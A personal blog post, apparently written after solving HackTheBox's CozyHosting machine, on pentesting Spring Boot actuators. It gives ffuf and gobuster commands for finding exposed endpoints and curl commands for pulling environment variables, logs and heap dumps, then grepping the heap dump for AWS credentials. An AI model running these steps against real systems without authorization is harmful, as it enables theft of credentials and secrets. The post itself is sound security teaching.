Rachit Arora

SpringBoot Pentesting

Sep 07, 2023

SpringBoot Pentesting

I was solving CozyHosting from HTB which had the initial foothold related to SpringBoot, so I’m gonna dive deeper like i always do

Vulnerable Spring application, if you want to test it out while reading the blog

GitHub - malexmave/blog-spring-actuator-example: An example project with a vulnerable Spring Actuator configuration, as a companion to a blog post

This github repository is associated with the blog linked down below

Spring Actuator Security, Part 1: Stealing Secrets Using Spring Actuators

What is Spring Boot?

Spring Boot is a powerful and versatile framework that simplifies the development of web applications. Its simplicity, versatility, and active community make it a popular choice among developers.

Spring ≠ Spring Boot

SpringSpring Boot
Spring is a popular Java-based framework used for building web applications.Spring Boot is a framework built on top of Spring.
Spring provides a wide range of features and tools for building web applicationsSpring Boot simplifies the development process by eliminating the need for developers to write boilerplate code.

The story of Actuator.

Spring Boot includes a number of additional features called actuators to help monitor and control an application when it is pushed to production. Actuators allow controling and monitoring an application using either HTTP or JMX endpoints.

They can be quite helpful in debugging or monitoring a Spring application, but if you expose them too widely, things can get dangerous very quickly.

Spring provides a list of all actuators that are present by default and can be enabled.

The built-in endpoints will only be auto-configured when they are available. Most applications choose exposure via HTTP, where the ID of the endpoint along with a prefix of /actuator is mapped to a URL. For example, by default, the health endpoint is mapped to /actuator/health

Fuzzing Actuators

ffuf -w ~/Desktop/tools/SecLists/Discovery/Web-Content/raft-large-files-lowercase.txt  -u http://10.10.11.224:55555/FUZZ

gobuster dir -w ~/wordlist/KaliLists/dirbuster/directory-list-2.3-medium.txt --url http://cozyhosting.htb/

Scanning pages simultaneously

$ cat domains.txt
domain.com
sub1.domain.com
sub2.domain.com
[... etc ...]

$ ffuf -w endpoints.txt:PATH -w domains.txt:DOMAIN -u http://DOMAIN/PATH

More about the way this could be automated and easier to understand is linked in the blog below.

Spring Actuator Security, Part 3: Finding Exposed Actuators using Dynamic Testing with ffuf

Finding Actuators ( Manually )

Spring Actuator Security, Part 2: Finding Actuators using Static Code Analysis with semgrep

Exploiting Actuators

Looking for Secrets


curl localhost:8081/actuator/env | jq .

// ... lots of stuff
"DB_CONN": {
    "value": "psql://server/db",
    "origin": "System Environment Property \"DB_CONN\""
},
// ... lots of stuff

Reading logs

curl localhost:8081/actuator/logfile

2022-08-24 13:45:14.813  INFO 68465 --- [http-nio-8081-exec-2] com.example.demo.DemoApplication         : Entering hello world function...
2022-08-24 13:45:14.814  INFO 68465 --- [http-nio-8081-exec-2] com.example.demo.DemoApplication         : Dumping AWS credentials for debugging purposes: Key: AKIATESTTEST Token: TESTingSecretAccessTest

Dumping the dump ( Heapdump)

curl localhost:8081/actuator/heapdump -o heap.bin

This endpoint does exactly what it sounds like - it takes a copy of the Java heap (i.e., the memory of the application) and provides it to me as a large blob of binary data.

Now you can just use strings heap.bin | grep -C 20 AWS

This does not even touch the surface of SpringBoot exploitation, I have linked better and more indepth blog about this by pros.

More about Exploiting Actuators

Spring Actuator Security, Part 1: Stealing Secrets Using Spring Actuators

Exploiting Spring Boot Actuators - Veracode

References

SPRING BOOT PENTESTING PART 1- FUNDAMENTALS

SPRING BOOT PENTESTING PART 2- ACTUATORS

Spring Boot Actuators

Spring Actuators

Have any questions

Do you have any questions? Feel free to reach out to me on twitter or on LinkedIn.